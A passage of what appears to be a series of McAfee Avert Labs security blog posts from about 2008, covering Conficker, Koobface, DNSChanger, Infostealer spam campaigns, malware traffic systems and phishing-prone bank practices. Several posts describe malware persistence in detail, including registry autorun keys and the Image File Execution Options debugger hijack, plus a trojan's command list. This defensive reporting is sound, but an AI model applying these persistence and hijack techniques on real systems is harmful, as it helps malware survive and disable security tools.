So in this instance it’s obvious that malware/worm writers are abusing open source tools to their advantage to make their work easier.

For those who haven’t patched their machines, we suggest you install the MS08-067 patch ASAP! If you are a McAfee Host IPS or Network IPS user, we’ve verified that you are protected against this worm by our Signatures ID’s 3961 and 0×40709d00 respectively. For VirusScan users, the DAT update version 5444 has coverage to detect this worm.

Today we at McAfee Avert Labs released the first of our new monthly publications: the “McAfee January Spam Report.”

Within its pages you will find excellent information on current spam trends, campaigns, and maybe even some “winners and losers.” Some of the highlights of the January issue include:

Political Spam
Tax Relief Junk Mail
Unemployment and Diploma Spam Increases
Christmas E-Cards

As well as some 2009 spam predictions! Definitely worth the download and read. Watch for our February issue in about four weeks. All spam reports, as well as other white papers, are available from our whitepaper download area here.

LinkedIn is a popular social networking site where you can manage business contacts online. Since you can set up a profile with links to your own website, it seems to attract criminals’ attention as well. A Google search reveals that several hundred fake LinkedIn profiles from nude “Kirsten Dunst” to nude “Hulk Hogan” exist already. The rogue profiles look all alike, with a picture of the celebrity and three links to the parts of the “nude video” like shown in the following picture.

This is exactly the lure - don’t follow these links! The linked websites contain obfuscated script code which decodes to a simple browser redirection. This obfuscated script code is proactively detected by McAfee as “Exploit-IFrame.gen.c” already.

If you’d follow the link (don’t do that!) to see how deep the rabbit hole goes, you will end up with a Traffic Management System like described in this Avert Labs blog entry. On every reload the server-side application will point to a different domain.

So when an unsuspecting user gets tricked to follow the lure, he will end up on different malicious websites trying the classical social-engineering tricks of either the “missing video codec” or of showing a fake AV scan and telling that the user his computer was infected with malware and offering a “free” AV scanner software, which in fact is the real threat. So beware when following links, even on trusted Web 2.0 platforms like LinkedIn. Especially when they promise some nude celebrity videos.

The Web’s classical social-engineering trick of the “missing video codec” tries to lure people into clicking on links or download and install an executable which pretends to be the missing application which is needed in order to watch the movie. The animated picture below is such an example: at first glance, it looks like a typically embedded video which is unable to load. The “picture” states that you’d have to click on it in order to see the movie. And here the lure begins - in this blog entry, we’ll follow it down and outline what kind of traffic management backbones are deployed for malware campaigns nowadays.

In our example the animated image is hosted on a popular blog platform and the link points to a suspicious Flash sample. As a quick analysis reveals, the Flash is compressed and additionally contains some obfuscated JavaScript code to hide its real intention. The script code redirects to another location.

The new location points to a so-called “Traffic Management System”. In this case, if you load the URL several times, the destination rotates and after too many retries you will be always redirected to the homepage of Google. The system remembers your IP address on the server-side for a certain time period. After that time, or when you just use another IP address, you will again see the redirections when visiting the URL.

The redirections are based on a typical HTTP “302 Found” response with a new location from the server where the traffic management system is installed. Another example, which also used Geo-Location, was outlined in this Avert Labs Blog post where a downloader trojan contacted such a system and based on the country, different malware binaries were downloaded.

Such traffic management systems nowadays are configured via web-based administration interfaces. Typically the links for the “incoming traffic” look like http://www.example.com/in.cgi?three or http://www.example.com/in.cgi?default where “three” or “default” stands for different campaign IDs inside the system. A typical rule could look like shown in the following picture.

The administrator is able to define rules for “incoming traffic” which results in different “outgoing traffic” based on different restrictions. For example, the Geo-Location could be used to redirect visitors from a particular country to one location while visitors from another country will be redirected to a different location - just think of localized campaigns targeted to the spoken language in these countries. So users from the United States will not be redirected to a french phishing web site and vice versa.

These traffic management systems can also use more complex rules based on network ranges and the referrer - so lets say that only visitors with a referer from Google will be redirected to a malicious web site as long as the IP address of the visitor doesn’t come from well-known network ranges belonging to security companies.

Why do that? This way, only users searching for the website will get to the malicious redirect, while the websites’ owner or administrator, who usually does not search for it but directly enters the URL into the browser, will see the normal website with no oddities. This helps the attacker to keep the infection under the radar for a longer time.

Other trafic management systems, like shown in the above picture, also feature different logins into the web interface - for the administrator, the “sellers” and the “buyers”. This particular system has different views for sellers of traffic - that is, infected web sites containing an IFRAME that points to the trafic management system -, and buyers of traffic - e.g. the people who run exploit servers and try to install malware on unpatched computers, thus looking for potential victims. Such traffic management systems can be in between the infected web sites and the exploit servers. As you can see in the above picture also payment options can be configured, so the more traffic a seller redirects to a buyer, the more money is paid. With such systems in between, the campaigns can be easily exchanged or the “traffic” can be sold to new buyers which try to install their malware.

So the classical starter, the “missing video codec” trick, can end up in quite a complex system managing modern malware campaigns. Visiting or following a malicious ressource nowadays means that you are redirected based on a complex server-side management system.

The last major event of the year has just ended: The 25th Chaos Communication Congress’ Closing Ceremony just took place. Now in its 25th year, making it one of the oldest annual IT security conferences on the planet, more than 4,000 visitors crowded the BCC in Berlin, making it difficult to get into the talks, much like at Defcon some years ago.

For the talks: As always there was a healthy mix of technical, culture, and society-related topics (the full schedule can be found here;) surprising was the low number of local speakers talking about security problems or releasing tools. This may be related to a lot of confusion about the impact of recent German legislation banning “hackertools.” Recordings of all talks will eventually be available here.

Some of the highlights of the conference (yes, with four days and three parallel tracks I’m certainly missing some that should be mentioned) were Security Failures in Smart Card Payment Systems, by Steven Murdoch; Fabian Yamaguchi’s talk about TCP DoS Vulnerabilities; SWF and the Malware Tragedy, by BeF and fukami; FX of Phenoelit talking about the State of Attack/Defense of Routers (start watching your infrastructure, folks!) and finaly the conference highlight, a talk about creating a rogue CA Certificate, by David Molnar, Marc Stevens, Benne de Weger, Arjen Lenstra, Dag Arne Oswig, Jacob Appelbaum, and Alex Sotirov. By taking advantage of known (and widely ignored) weaknesses of md5-signed certificates and bad implementation of a CA, they were able to create a Rogue CA Certificate, trusted by all browsers–OUCH!

A very interesting note concerning the Rogue CA talk: They didn’t give out any details on what they were planing to talk about until just before the talk itself. As they were afraid that someone or some company might try to gag them and prevent the talk from happening, they were discussing the content with affected parties only under NDA. Meaning: They made the other party sign the NDA, not the other, usual, way around!

This year there were a number of talks about mobile phone (in)security and about the GSM network in general, an interesting trend to follow in the next months/years. And at the very end a vulnerability affecting many Symbian-based phones, trivial to exploit manually, had been released: SMSCurse (I’ve got no working link at the time of this writing). It basically crashes the SMS messaging on a phone and may require factory reset to restore it, depending on the phone.

I took this as an opportunity to create a current backup of my phone–how old is your latest backup?

Have a Happy and Safe New Year!

A small detail about a virus described in our virus information library recently caught my eye. The virus was W32/Greener (http://us.mcafee.com/virusInfo/default.asp?id=description&virus_k=153430). The thing that jumped out at me was that the virus appends the string “Win32.Dakila” to the infected file.

“dakila” is a Filipino word meaning “great” in English. The proud Pinoy (colloquial, meaning Filipino) that I am, I had to investigate. The last time the Philippines was in malware-related news was in 2000, when VBS/Loveletter@MM (http://us.mcafee.com/virusInfo/default.asp?id=description&virus_k=98617), a mass-mailing worm broke out. It was said to have originated in the Philippines. Within a day of launch, millions of users received a “love letter” from someone they knew, containing a VBScript attachment. That was probably the earliest demonstration of the effective use of social engineering in malware. Before that the common advice was to be wary of e-mails coming from someone they didn’t know. Since then, any email bearing attachments has become suspect.

There’s some good information on W32/Greener in our virus description but other than the word “dakila” nothing else indicated that it was authored in the Philppines. I decided to obtain a sample and dig deeper. Here’s what I found.

The virus was written in Visual Basic and is packed with UPX. When executed, the virus creates a copy of itself in the %windir% folder with a filename randomly chosen from a fixed list list of names. The virus then searches for files with the .jpg or .JPG extension and replaces them with a file with the same name but with a .exe extension. The virus makes this new file appear as the original image file by:

1. Using the icon of an image file.
2. Making changes to Windows explorer settings to hide file extensions.
3. When doubleclicked, the virus first re-creates the original .jpg file and opens it.

The virus also takes steps to hinder analysis and detection:

• Disables the task manager
• Disables registry editing
• Disables the “Folder Options” item in the Windows Explorer menu
• Terminates security-related processes
• Strings (filenames, registry entries, etc.) in it’s body are in encrypted form

The virus ensures that it runs when Windows starts by creating the following registry entries:

• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\”<random word>” = “%windir%\<random word>.exe
• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\”<random word>” = “%windir%\<random word>.exe
• HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\”AlternateShell” = “%windir%\<random word>.exe

  - an attempt to launch the virus automatically even in safe mode.

• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\”<well known ececutable>” = “%windir%\<random word>.exe

  - this appears to be an attempt to have the virus launched when certain well-known programs are run. This is a known autorun method, but the author got it wrong and his/her implementation does not work.

The virus contains a time-triggered payload. When the time of day is 11:13 AM or 6:13 PM, the virus displays a message about global warming then initiates a shut down.

Going back to why I became interested in this virus in the first place, I confirmed that it must be Philippine-made. Countless Filipino words are used for filenames, form names, etc. Thankfully this one won’t have the same impact as VBS/Loveletter@MM because of it’s limited replication vectors.

Today a new downloader trojan is being spammed widely. This spam message arrives as a reply to the victim’s query of asking for the wire transfer.

When users run the file “bank_statement.scr” in the attachment zip file, it downloads the BackDoor-DSG trojan, while in the background it downloads an innocent pdf document from a legit site and opens it for deception. The pdf document, however, is not relevant to the wire transfer.

We see that the trojan file is repacked for each message, thus none of them are identical. In addition to that, this time the malware authors are changing resource sections in those pe files such as Icons, and file properties.

For example, we observed following icons:

Other resources:

File Descrption:

• Auto-reader Module
• Reader_Module
• Adobe Reader HSMC
• Adodb_SSL_reader

Translation:

• English
• Spanish
• Korean

CompanyName:

• Adobe
• ADOBE

These crafted resources, as well as the malicious code, are the result of server-side polymorphism to attempt to evade detections by Anti-Virus software. McAfee Avert Labs detects the current wave of the downloader as BackDoor-DSG.dldr trojan, and dropped files as BackDoor-DSG with DAT 5474 or later.

Recently we blogged about an unpatched Internet Explorer 7 exploit in the wild. With the vulnerability information made public, McAfee Avert Labs has noticed a spike in the number of active websites hosting this exploit. Lately we are seeing customized versions of the IE 7 exploit with varying degrees of obfuscation.

Malware authors have been coming up with innovative mechanisms to leverage this exploit to social engineer the not so tech-savvy internet users. One of the most prominent and unique techniques adopted by the malware authors involves a Microsoft word document being sent out to an unsuspecting user.

Upon opening the word document the embedded ActiveX control with the following classid  is instantiated and executed.

• {AE24FDAE-03C6-11D1-8B76-0080C744F389}

This control stores configuration data for the policy setting Microsoft Scriptlet Component.

The control then makes a request to the webpage hosting the IE 7 exploit. The charm with this approach is that the exploit is downloaded and run without the knowledge or permission of the user. To the unsuspecting user it will just appear as yet another normal Doc file.

Microsoft has issued workarounds to block known IE 7 exploit attack vectors. We want to reiterate to all our readers to be vigilant and cautious while opening unknown Doc files or visiting dubious websites, while we continue to monitor the threat and protect our customers against the menace .

The infamous DNSChanger family again got into focus earlier this month, due to the fact that the latest variant is able to inject DHCP “Offer” packets containing rogue DNS server IP addresses into the network traffic. Therefore one infected computer in a network could pose a risk for all the other hosts using DHCP. In this blog entry, we want to outline what risk such network changes would pose.

Rogue DNSChanger servers can typically be found in the range 85.255.112.0/20 of “UkrTeleGroup”, formerly known as “Inhoster”. The oldest malware description in the McAfee Threat Library using these suspicious DNS servers is dated back to 2005 (see DNSChanger.a for more information). Scanning the whole network unveils more than 400 running DNS server instances at the moment. That is, ten percent of the whole IP range consists of nothing other than DNS servers. The whole network is believed to be even bigger, but not all servers in this range are answering to DNS requests at the moment.

A very serious issue with computers using these rogue DNS servers located in the Ukraine is that they resolve a number of security-related domains differently than a benign DNS server would do it. For example, DNSChanger-affected computers could access and surf to ‘www.microsoft.com’ without any changes, but are not able to download the latest updates from ‘download.microsoft.com’.

The 400+ DNS servers resolve the domain name to ‘127.0.0.1′, which just means the computer tries to download the patches from the “localhost” address meaning that the bad guys successfully blocked access to important updates. However other security related domains – including ‘download.mcafee.com’ – are blocked like shown in the following screenshot:

The behavior is entirely controlled by the attackers’ DNS servers. These could even redirect existing domain names to servers hosting crafted content (Phishing) or servers dynamically modifying real content. Once your DNS settings are under control, the bad possibilities are unlimited. The criminals controlling these servers could also limit their attacks to regional locations or do their business from “dusk till dawn” to stay under the radar.

The good folks at the “Internet Storm Center” have suggested blocking or at least monitoring the entire range several times, starting first early 2006 because of the bad stuff coming out of this space. If you are a home or small business user and don’t want to route into these Ukraine based network, you could simply block access at the router level like shown in the screenshot below. Many popular “Small Office / Home Office” devices feature such an ACL (Access Control List) feature.

Enterprise customers should force all clients within their network to only use the default DNS server(s) and block access to non-trustworthy servers at the gateway level to ensure no one externally controls your DNS. Internet Service Providers could also mitigate the risk for their customers by dropping connections to these rogue DNS servers and additionally force their customers to only use the ISP’s controlled DNS servers.

From fake online banking to regionally targeted celeb porn - that’s just two days in the life of a “FormSpy” (a.k.a. “Infostealer”) malware campaign. In the past few days a spam run started to promote a fake “Bank of America” web site, announcing a change of the online banking’s interface to its “customers.” For these “customers” to be able to have a quick look at the “demo” page, a preview link is provided as shown in the sample spam mail:

Innocent users that follow the lure by clicking the link are presented a fake banking web site which uses the well known missing-codec-trick that is used to convince users into downloading an additional component for a website or video to work. This time it is an apparent update for “Adobe Flash Player” which they require you to install for their “demo page” to work. The update of course isn’t any legit software but a trojan instead.

We have taken a concise look under the trojan’s hood - it not only installs a rootkit but also collects private information from the infected computers. This information is leaked to a server using HTTP POST requests and in the end may either be sold or used to spread the attacking party’s malware further.

The embedded rootkit is written to harddisk once the trojan is executed - the rootkit driver’s Portable Executable header can be seen in the screenshot below.

Among this private information are POP3, IMAP and FTP server credentials but also credentials for the popular “ICQ” instant messenger. See below for a screenshot of the malware’s pseudocode:

The trojan moreover is capable of receiving and executing commands from the malicious host that it phones home to, so the malware’s behavior may change and “improve” anytime.

The list of commands currently understood by this variant of the trojan is as follows:

• “VER” - sets a “version” key underneath the Windows Registry path “HKEY_CURRENT_USER\Software\Microsoft\InetData” to a particular string
• “EXE” - updates itself by downloading a new version, storing the resulting executable to the Windows path. The filename is randomly chosen, depending on the current time
• “DL” - downloads an executable from the Internet (but doesn’t run it)
• “DL_EXE” - downloads and runs an executable from the Internet
• “DL_EXE_ST” - downloads an executable from the Internet, adds its path to “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run” and executes it
• “REBOOT” - forces the computer to reboot

An additional spam run targeting Swiss Internet users has been reported by the “Reporting and Analysis Centre for Information Assurance MELANI” just yesterday. The mail, written in German language, promotes a Swiss adult web site hosting celebrity videos. Subjects include “Bl*wj*b with Madonna” or “Britney Spears in front of porn camera – scandal“. When following any link contained in the mail, the user is directed to one of many different malicious domains showing pages similar to the one seen below.

Just like with the fake banking web site mentioned above, the videos presented on this celeb page are told to not work without a codec - too bad! This time the user is bribed with a high definition video plugin named “Adobe Player HD plugin”. Again, this of course isn’t a missing codec but rather a trojan aimed at downloading further malware. Noteworthy about this downloader is it’s contacting a web server with a traffic management system installed - contextual to the user’s Geo-Location, different malware is delivered. While, for instance, a user from Germany will be sent a file called “de.exe”, …

HTTP/1.1 302 Found
Date: Wed, 10 Dec 2008 15:33:58 GMT
Server: Apache/2
Set-Cookie: …
Location: http://***-*****.com/de.exe
Vary: Accept-Encoding,User-Agent
Content-Type: text/html

… a user from Switzerland will get “305.exe”:

HTTP/1.1 302 Found
Date: Wed, 10 Dec 2008 15:39:48 GMT
Server: Apache/2
Set-Cookie: …
Location: http://***-*****/305.exe
Vary: Accept-Encoding,User-Agent
Content-Type: text/html

By comparing the malware currently spread by the malicious host, Swiss residents are delivered a variant of the same “Infostealer” family as seen in the “Bank of America” spam campaign shown above. Users from Germany are delivered a spam bot instead. So spam mails are sent from victims in one country, and information being stolen on computers of victims from another country.

The “FormSpy” (a.k.a. “Infostealer”) malware is blocked by Artemis as “Generic!Artemis (trojan or variant)”, additional coverage is in the 5461 DATs.

Many of us consider the Internet community to be a collective conscience, and consider the dirty schemes that tricked us once upon a time to now be common sense no-nos. Unfortunately, newcomers to the Internet community do not (yet) have a means of digitally absorbing all of the wisdom we’ve learned as web-surfing veterans. While today, you’re likely to look at someone who’s never been on the Internet as an alien life form, many new users are surprisingly logging on for the first time. Even in the US, the advent of cheap broadband is leading more schools, offices, and households to incorporate the Internet as an everyday way of life, and with that come a lot of nuances. In addition to this, scammers are getting smarter and finding new ways to trick seasoned Internet users. Even if you’ve been online for years, it can sometimes be difficult to spot new tactics being used to e-mug you.

While it’d be nice to think that common sense will always protect you, common sense alone has shown to be only marginally effective against the evolving online fraud syndicate. The FBI’s 2007 IC3 summary reported over 200,000 complaint submissions of online fraud, up from the mere 16,000 complaints received when the program began in 2000. Of the complains received, the typical kind of scam that would give your common sense a chance to flex - Nigerian 419 scams - represented only a mere 1% of all complaints, suggesting very few people are falling for these anymore. Instead, the new big-ticket item in the underworld of fraud is phishing. Phishing is considered by the FBI as “foremost” among email based scams, and seeks to illicit information about a person’s identity – such as credit card and social security numbers, and other information which can be used to commit crimes of identity theft. Phishing is a smoke and mirrors trick designed to fool you into thinking you’re logging into your bank or credit card’s website, when in reality you’re using a mock-up site designed to steal your personal information.

Online fraud and identity theft crimes consisted of over 17% of the total complaints received in 2007. It’s no surprise that online fraud is growing given how lucrative fraud scams can be. In 2007, over $239 million was lost by those reporting complaints to IC3. This set a new record for financial loss, and yet the number of actual complaints was at a three-year low. The complaint count was similar to that of 2004, yet in 2004, only $63 million had been lost to scammers. This suggests that scammers have become much more efficient than they used to be. Today’s criminals clean people out of more money, and do it with less effort.

It’s no surprise too that 32% of these scams were perpetrated using a website, and 73% involved email correspondence. It’s relatively inexpensive to deploy a phishing site kit on hundreds of hacked or free web servers and then send out millions of email messages to hook the few unsuspecting individuals who fall for the bait. While a specialist in the field might recognize the site to be a forgery, the average computer user has only a few basic instincts to know whether they’re safe.

Most Internet users will apply some form of common sense rules when visiting a website. The most valid question they can ask is, “does the URL in my address bar match that of my financial institution?” Simply applying this one basic rule can thwart a majority of phishing attacks. Applying the wrong types of common sense assumptions can be dangerous. Replies from victims such as, “the website looked real to me”, and “the link in the email looked right” are not uncommon, and are usually the result of being taught a few bad habits.

Scammers are working actively to outsmart their victims, but what the victims might not know is that there is another factor also working against them: their financial institution. Even after years of knowing how phishing sites operate, many banking and credit card institutions continue to teach their customers bad habits by conditioning them in ways that poison their common sense. None of this is done maliciously, of course, but somehow their webmaster never got the memos about phishing. Some of the bad habits your financial institution might be teaching you include: 

Click This Link

After years of knowing this is a bad idea, many legitimate websites are still sending email messages to their customers with clickable links. Clickable links have been abused by phishing scammers since the beginning because they allow you to craft a web address that displays the legitimate institution’s website URL in the email, but will take you to the scammer’s mock-up website when you click on it.

Using clickable links in correspondence conditions the customer to fall victim to these types of scams, and causes them to ignore the URL in their address bar. 

Email sent from your company should never instruct a user to click on a link. Instead, instruct them to simply visit your website. If you must provide a URL, provide it in plain text and keep it simple.

Paste This Link

Almost as bad as clickable links is the practice of instructing a customer to copy and paste a link into their browser. This is another common bad habit that has been exploited by scammers to steal your personal data. Many scammers simply remove the leading www prefix, or the http:// protocol prefix to avoid filters from seeing the URL in their email. This conditions the customer to assume the link is valid because it’s not clickable, and might also prevent them from visibly confirming the URL.

Email sent from your company should never provide a URL so complex that it must be copied and pasted. Provide only the main URL to your website, which the customer should be able to identify with. Anything overly complex should be linked to from the website once they get there.

Multiple SIgn-On Domains

A customer can only know if they’re visiting a legitimate website if the URL in the address bar matches. Many large banks, however, have taken on the poor practice of using multiple domains, and sometimes even using outsourced, third party URLs, to sign customers in. This confuses their customer and conditions them to disregard the URL in the address bar, since they’ll never know if it’s right or not.

Your company should use a single sign-on page and only one domain name for a customer to identify with. Like the entrance to a concert or other special event, your website should funnel everyone through one central line. This will avoid confusing your customer about which domains you’ve registered; most customers don’t know how to look this information up.

Multiple Sign-On Pages

In addition to using multiple sign-on domains, many companies use different sign-on pages to log into different types of accounts, or present different pages depending on where the customer is navigating. This desensitizes the user to the look and feel of your website, making them more likely to miss the variations in counterfeit websites, which might have otherwise raised a red flag. 

The customer should not depend on whether a website “looks” real, however when they are desensitized to the layout and branding of your sign-on page, you increase their likelihood of falling for a scam. It is said that bankers are the best at spotting counterfeit currency because they work with the real thing all day. Your customers can be taught to spot a forgery simply by using one central sign-on page. This page should also have a simple URL that the user can become familiar with. All other pages on your website should link to this one sign-on page.

Log In To Verify Your Account

Scammers have used various forms of fear mongering for years that have tricked victims into logging in to verify account details. Some of these scams include informing the victim that their account is suspected of fraud, that the account has been suspended, or that they will need to verify their information to avoid an account lock. All of these notifications advise the victim to make an urgent effort to log in.

When a customer is under duress, they are more likely to skirt their normal common sense checks to address the problem. Companies engaging in this same practice cause their customers to get into the habit of responding to these types of urgent notifications, increasing their chances of falling victim to a bogus one. If a notification is urgent enough to warrant an account lock, it is important enough to be delivered to the customer via telephone, and with proper verification procedures to identify your company to the customer. Sending urgent messages via email is only inviting trouble.

Security Images

Many websites employ security images to convince the user that they can feel safe logging in so long as they see a teddy bear, a train, or some other image they choose from a library when creating their profile.  As phishing scams become more complex, scammers’ websites can easily start acting as proxies to the legitimate website. This isn’t in widespread use yet, but a few isolated incidents have been seen, and the technique is easy to craft: when you enter your username into the phishing site, the site turns around and queries the legitimate website for your security image. It can then display the security image to the customer to gain their trust.

Security images and other enhancements are an added layer of security, but your customers should be aware that they can be easily spoofed. Instruct your customers to rely on the website URL, rather than a security image, and to only use the security image as an added means of verification.

In addition to these bad habits, many companies avoid addressing the problem entirely, and teach their users that they can protect their account by employing policies such as strong passwords or usernames requiring a digit. Security questions are another common layer added to websites that don’t do much to them more resilient. None of these techniques will necessarily have any affect in strengthening security against a phishing attack, because the customer is providing the information directly to the scammer’s mockup site. Even revolving security questions can be easily phished when the scammer is familiar with the questions prompted by the institution.

Identifying legitimate correspondence is the first line of defense a customer has in avoiding a scam. The best thing you can do as a company is to inform your customer that you will never prompt them to click on or paste a link, never instruct them to enter their credit card number online, and familiarize them with the only website URL they should ever associate with your company.

Unfortunately, many websites still teach bad habits. Large banks continue to use multiple website domains, rather than centralizing all of their sites under a single web address. Other companies have abandoned common sense entirely and send email closely resembling existing phishing scams, complete with hot links and urgent requests. Facebook was recently slammed in the tech community for sending clickable links to their users prompting them to verify information in their account. They’re not alone, however, as many other popular online institutions have been known to follow similar practices.

In July, we published findings that SPF/DKIM usage was declining among the Fortune-500 companies. Of the 500 wealthiest companies, less than half were implementing the simple, free anti-forgery countermeasures to protect users from spoofed email. You can read more about this at this link.

Businesses can’t prevent their customers from being scammed, but they can help to educate and condition them to recognize legitimate correspondence. The first step in doing this is to encourage sound practices when visiting your website. By helping your customers avoid becoming victims, you’re helping to avoid headaches that will ultimately become yours, and ensure that your customers remain satisfied ones, likely to return.

Malware authors continue to find unique ways to ensure that their malicious code runs at system start-up.

One such method is through this lesser known registry key:

HKey_Local_Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

This registry key is intended to specify the name of a debugger, in this case “Olly Debugger,” based on which one can debug an application when it starts.

For example:

To debug notepad.exe when it starts, one simply has to go to this registry key and create a subkey called notepad.exe.

A string value is then created for this subkey, assigned the name “debugger,” and given a value. In the case of Olly debugger, this is what it would look like:

This now ensures that every time the notepad application is invoked, Olly debugger runs instead, which, in turn, opens notepad, enabling it to be debugged.

Here’s the unique aspect about this registry key:

If we replace the debugging application (Olly debugger in this case) with a malicious executable (e.g., trojan.exe), the control will now be redirected to trojan.exe every time notepad.exe is run.

Microsoft intended this registry key to be a useful feature; however, there exists no mechanism whereby Windows can check whether the application to which control is being redirected is, in fact, a rogue application.

I managed to find information on this start-up method, which dates back to 2005. Unfortunately, malware authors are exploiting this very feature to:

1. Start up malicious files, even though the unsuspecting user intends to run another clean application
2. Disable security products, by redirecting the security products’ processes to malicious processes

Tools such as msconfig.exe, intended to check for start-up entries, are underequipped to handle this and do not detect applications that use this redirection technique. Users are advised to use “Autoruns” from Sysinternals instead.

See the screenshot below:

On a related note, the next time you happen to struggle with a severely infected machine with no anti-virus solution or with outdated signatures, you can redirect the malicious process to a clean file using the technique mentioned above.

For example, you can redirect “trojan.exe” to a “clean.exe”. See below:

The next time the malicious process tries to execute itself, the clean file will instead be executed, thus preventing the malicious file from spawning again. As always, remember to back up your registry before doing this.

We have lost count of how many blogs we have written this year that have anything to do with zero-day threats or unpatched vulnerabilities.

Today, many Internet users in China have reported an infection, presumably from browsing the web using a fully patched version of Microsoft Internet Explorer 7.x. My colleague Xiaobo Chen and I investigated the incident and found it to be an active exploit containing downloader shellcode that installs the Downloader-AZN Trojan (proactively detected as New Malware.n since 2005 when scanning with heuristics enabled).

The root cause was found to be the incorrect handling of certain XML tags in Internet Explorer 7.x that references already freed memory in the mshtml.dll.

We have confirmed this vulnerability to be affecting, at least, a fully patched Windows XP SP3 and a Vista SP1 system. The exploit uses publicly known heap-spray techniques that enable control over a vtable pointer, allowing arbitrary code execution.

Fortunately, the 5404 DATs proactively detect the Downloader-AZN Trojan, but there could be other variants. Additional coverage is going into today’s DATs to detect the malicious web scripts as Exploit-XMLhttp.d or Exploit-XMLhttp.c Trojan.

Details about this vulnerability, as well as exploit code, are known to be publicly available.

More information on this situation will be posted as it becomes available.

Today McAfee released its Virtual Criminology Report, our annual study of global cybercrime. We found that cybercriminals are targeting their scams to play off of the economic recession, and governments need to be doing more collaboration to face the problem.

The economic downturn affected cybercrime scams almost immediately. As soon as banks started struggling and mergers and acquisitions became commonplace, we started seeing an immediate increase in banking scams asking users to ‘update their account information’ before the bank changed hands. With almost all of today’s malware being financially motivated, even cybercriminals are looking for more business in tough economic times and are really stepping up their game.

This represents an evolution in the trend of cybercriminals getting smarter and faster about what they do. When news of a specific banks going under hits, scams and malware utilizing that messaging will emerge the very next day. The same happened with threats throughout this year’s presidential race as well as post-election; when President-Elect Barack Obama messaged malware emerged as early as November 5.

The environment of fear and anxiety in consumers that is being caused by the downturn also provides opportunity for cybercriminals to lure consumers into what they think are ‘internet sales marketer’ positions, where they are actually unknowingly assisting in criminal activity as money launderers. We have been seeing an increase in the number of these job postings and recruitment emails promising job seekers will ‘get rich quick.’ The scams are also strategically worded to place high on Google job searches, and are of course designed to look like legitimate job postings.

It is more important than ever that computer users educate themselves in safe searching and safe computing habits. Technology alone cannot solve the problem. Education alone cannot solve the problem. Both combined, however, can enable us all to use the Internet the way we want.

Download your copy of the report here.

Educate. Advocate. Protect.

A new variant of Koobface (a worm that spreads over Social Networking sites) was recently making the rounds on Facebook.  Users reported receiving spam messages, such as:

When a user follows the link, they’re redirected to one of many different compromised hosts, which displays a fake error message that the version of Flash is out of date.  Next the user is prompted to download/open flash_player.exe, a new Koobface variant.

If the user choose to install the executable, a fake error message is displayed.

Facebook is already aware of this threat and is purging the spammed links from their system.  But with dozens of Koobface variants known to exist, the situation is likely to get worse before it gets better.  It’s important to note that spammed links leading to Koobface are likely to come from infected friends, reminiscent of early mass-mailing worms.  The safe-computing practice created more than 10 years ago still applies today, which is not to open any unexpected email attachments, even if they are from someone you know.  Only in this context, it must be expanded to the following:

The upcoming DAT release contains detection for the new Koobface variant, while users of McAfee Artemis Technology are already protected in real-time against this threat.

As for the motivations behind this Koobface variant, analysis shows that during infection a proxy server is installed to %ProgramFiles%\tinyproxy\tinyproxy.exe and a service named Security Accounts Manager (SamSs) is created to load the server at startup.   This component listens on TCP port 9090 and proxies all HTTP traffic, in particular looking for traffic to Google, Yahoo, MSN, and Live.com for the purpose of hijacking search results.  Search terms are directed to find-www.net.  This enables ad hijacking and click fraud.

It’s déjà vu again when Internet scamsters take advantage of the approaching Christmas holidays to entice computer users into opening malicious emails in the guise of holiday promotions or postcards. In the runup to Christmas, every year we see malware authors use varying themes to infect users. And this December is turning out to be no different.

Already into the first week of December, McAfee Avert Labs has observed two active spam campaigns using  malware-laced Christmas themes. The first is a spammed e-greeting that links to an IP address hosting an old school IRC/Bot SFX package. The animated image in the email is taken from a legitimate site while the bait IP address [202.82.11.4] belonging to a compromised web server based in Hong Kong.

The second threat is a new worm christened W32/Xirtem@MM. This worm has a built-in SMTP engine that mass mails copies of itself to email addresses harvested from an infected machine. It uses subjects ranging from Hallmark E-Cards to McDonalds and Coca-Cola Christmas promotions. And to lend authenticity to the email, the images displayed in the spammed email are directly borrowed from the parent websites of Hallmark, McDonalds, and Coca-Cola.

The worm also has the capabilities of spreading via removable storage devices and peer-to-peer networks. Upon execution, it displays the above picture to trick users into believing that it was a harmless image file.

The upcoming 5453 DATs to be released today contains detection for the W32/Xirtem@MM worm while users of McAfee Artemis Technology are already protected in real-time against these type of threats

In the coming weeks, these tactics will tend to evolve rapidly, from crude to sophisticated, as spammers increasingly use Christmas based themes to lure victims. With the level of sophistication seen in today’s threats, the malicious payload could easily be hidden within layers of obfuscation or clever social engineering, and could fool even the savviest of users who try to inspect an email before opening. It is therefore imperative that users are educated on how to avoid becoming a victim. Visit the McAfee Security Advice Center to learn all about online and computer safety tips to help you stay protected.

A picture is worth a thousand words…

First let me say, “PATCH your systems” if you have not done so already!

Seriously, you and your machines are sitting ducks for attacks such as MS08-067, which we learned about from Microsoft last month. This type of attack is especially dangerous if your Windows Updates or security products are not up to date. Microsoft released its out-of-cycle emergency patch on the 23rd of October–more than one month ago–so you have no excuse today for being at risk!

At McAfee Avert Labs we have seen a few proof-of-concept binaries using the exploit code that was released into the wild to attack this Windows Server Service vulnerability; the latest is W32/Conficker.worm. According to the description in our Virus Information Library, W32/Conficker.worm decides how it will load itself as a Windows Service depending on whether the compromised version of Windows is Windows 2000.

Once loaded in the service space, the worm attempts to download files from the Internet–specifically, further malware from trafficconverter.biz and data files from maxmind.com.

The worm continues by setting up an HTTP server that listens on a random port on the victim’s system while hosting a copy of the worm. It then scans for new vulnerable victims to exploit, at which point the new victim will download the worm from the previous victim and so on.

To recap McAfee’s coverage and protection for this vulnerability, please check here. We have increased coverage in today’s DATs (Version 5445) to protect against this, and future variants, of the W32/Conficker.worm.

For more information on the Microsoft vulnerability, refer to their security bulletin.

As many of us enter the holiday season of Thanksgiving it’s vital to ensure your systems are patched and up to date while you’re enjoying your time off. Malware doesn’t break for holidays!

Today marks another day of momentous change for McAfee’s research teams.

